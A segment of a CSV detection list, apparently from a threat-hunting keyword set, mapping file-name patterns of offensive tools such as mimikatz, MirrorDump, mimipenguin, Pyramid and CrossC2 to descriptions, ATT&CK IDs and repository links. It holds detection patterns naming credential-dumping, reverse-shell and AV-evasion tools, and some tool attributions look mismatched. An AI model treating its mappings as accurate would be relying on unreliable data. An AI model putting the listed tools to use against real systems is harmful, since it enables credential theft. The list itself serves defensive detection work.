TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*/micr0_shell.git*",".{0,1000}\/micr0_shell\.git.{0,1000}","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","2","126","18","2024-02-19T02:15:36Z","2023-08-13T02:46:51Z" "*/MicroBurst.git*",".{0,1000}\/MicroBurst\.git.{0,1000}","offensive_tool_keyword","MicroBurst","A collection of scripts for assessing Microsoft Azure security","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/NetSPI/MicroBurst","1","1","N/A","6","10","1905","305","2024-04-19T17:38:56Z","2018-07-16T16:47:20Z" "*/mikrotik-routeros-brute.nse*",".{0,1000}\/mikrotik\-routeros\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mimi32.exe*",".{0,1000}\/mimi32\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimi64.exe*",".{0,1000}\/mimi64\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimicom.idl*",".{0,1000}\/mimicom\.idl.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimidogz.git*",".{0,1000}\/mimidogz\.git.{0,1000}","offensive_tool_keyword","mimidogz","Rewrite of Invoke-Mimikatz.ps1 to avoid AV detection","T1055 - T1560.001 - T1110.001 - T1003 - T1071","TA0005 - TA0040 - TA0006","N/A","N/A","Credential Access","https://github.com/projectb-temp/mimidogz","1","1","N/A","10","1","0","0","2019-02-11T10:14:10Z","2019-02-11T10:12:08Z" "*/mimidrv.sys*",".{0,1000}\/mimidrv\.sys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimidrv.zip*",".{0,1000}\/mimidrv\.zip.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz.bin*",".{0,1000}\/mimikatz\.bin.{0,1000}","offensive_tool_keyword","InflativeLoading","Dynamically convert a native EXE to PIC shellcode by prepending a shellcode stub","T1027 - T1055 - T1140","TA0005 - TA0042????","N/A","N/A","Defense Evasion","https://github.com/senzee1984/InflativeLoading","1","1","N/A","10","3","221","48","2024-04-12T17:14:07Z","2024-01-05T03:59:33Z" "*/mimikatz.enc*",".{0,1000}\/mimikatz\.enc.{0,1000}","offensive_tool_keyword","mortar","red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions","T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562","TA0002 - TA0003 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","1","N/A","10","10","1347","219","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z" "*/mimikatz.py*",".{0,1000}\/mimikatz\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*/mimikatz.sln*",".{0,1000}\/mimikatz\.sln.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypass/mimikatz.py*",".{0,1000}\/mimikatz_bypass\/mimikatz\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypass/mimikatz2.py*",".{0,1000}\/mimikatz_bypass\/mimikatz2\.py.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypassAV/main.exe*",".{0,1000}\/mimikatz_bypassAV\/main\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_bypassAV/mimikatz_load.exe*",".{0,1000}\/mimikatz_bypassAV\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimikatz_load.exe*",".{0,1000}\/mimikatz_load\.exe.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilib.def*",".{0,1000}\/mimilib\.def.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilib.dll*",".{0,1000}\/mimilib\.dll.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/bmarchev/Forensike","1","1","N/A","10","1","17","2","2024-03-18T10:40:58Z","2024-02-01T13:52:55Z" "*/mimilove.c*",".{0,1000}\/mimilove\.c.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilove.h*",".{0,1000}\/mimilove\.h.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimilove.rc*",".{0,1000}\/mimilove\.rc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*/mimipenguin.*",".{0,1000}\/mimipenguin\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/mimipenguin.c*",".{0,1000}\/mimipenguin\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipenguin.md*",".{0,1000}\/mimipenguin\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipenguin/*",".{0,1000}\/mimipenguin\/.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","10","10","2127","327","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z" "*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mimipy.py*",".{0,1000}\/mimipy\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/mimishim/*",".{0,1000}\/mimishim\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/minidump.go*",".{0,1000}\/minidump\.go.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*/minidump.zip*",".{0,1000}\/minidump\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*/minidump-rs.exe*",".{0,1000}\/minidump\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/minimal_elf.h*",".{0,1000}\/minimal_elf\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","223","41","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" "*/mirai_pass.txt*",".{0,1000}\/mirai_pass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MirrorDump.exe*",".{0,1000}\/MirrorDump\.exe.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/MirrorDump.git*",".{0,1000}\/MirrorDump\.git.{0,1000}","offensive_tool_keyword","MirrorDump","LSASS dumping tool that uses a dynamically compiled LSA plugin to grab an lsass handle and API hooking for capturing the dump in memory","T1003 - T1055 - T1574","TA0006 - TA0005 - TA0003","N/A","N/A","Credential Access","https://github.com/CCob/MirrorDump","1","1","N/A","10","3","258","59","2021-03-18T18:19:00Z","2021-03-18T18:18:56Z" "*/Misc/donut.exe*",".{0,1000}\/Misc\/donut\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","473","63","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" "*/mitmAP*",".{0,1000}\/mitmAP.{0,1000}","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1645","272","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" 